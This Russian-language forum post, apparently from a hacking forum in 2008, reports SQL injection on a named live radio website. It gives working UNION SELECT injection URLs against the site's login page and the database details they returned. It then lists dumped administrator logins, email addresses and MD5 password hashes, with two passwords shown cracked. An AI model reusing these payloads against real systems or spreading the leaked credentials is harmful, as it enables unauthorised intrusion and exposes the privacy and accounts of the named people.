04.10.2008, 15:38
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Юмор ФМ, популярное радио и всё такое...
SQL inj присутствует чуть не в каждом параметре.
PR = 3 тИЦ = 30
1) Пятая ветка, доступ к "INFORMATION_SCHEMA" есть.
Код:
http://humor.fm/login/?error=1'+UNION%20SELECT%20CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE())%23
humor@localhost : 5.0.51a-3ubuntu5.1-log : humor
2) Пойдём дальше. Получив все данные из "INFORMATION_SCHEMA"
Код:
http://humor.fm/login/?error=1'+UNION%20SELECT%20CONCAT_WS(0x203A20,login,email,password)%20from%20db_user%20LIMIT%200,1%23
0,1 - выводим по пользователю из БД.
3) А вот и наши админы:
admin : support@idea.net.ua : 5f7c5e847d547b984bab4020c33673ac
cappy : cappy@mail.ru : 168416487b5b0dea3478992a914c7706 - Пасс: fdnjh
qwas : qwas@idea.net.ua : c8e25115addeda1656b52cfbe7b2b780
Joker : joker@idea.net.ua : 589ca240c5222730de730b7013c3b9b6
Decoy : decoy@idea.net.ua : b882e3b467d649792fc4c0cc49592e90
dc : dc@humor.fm : fe07cb53c5b30a97380c6c87efad14b2
kerber : kerber@idea.net.ua : 58acb17af943b7218bca87690910c555 - Пасс: 100385
В итоге, админку не нашёл, в панели юзверей ничего интересного нету ;(
Так-же большое спасибо Alexsize за помощь по SQL
Последний раз редактировалось Nightmarе; 04.10.2008 в 15:44..
|
|
|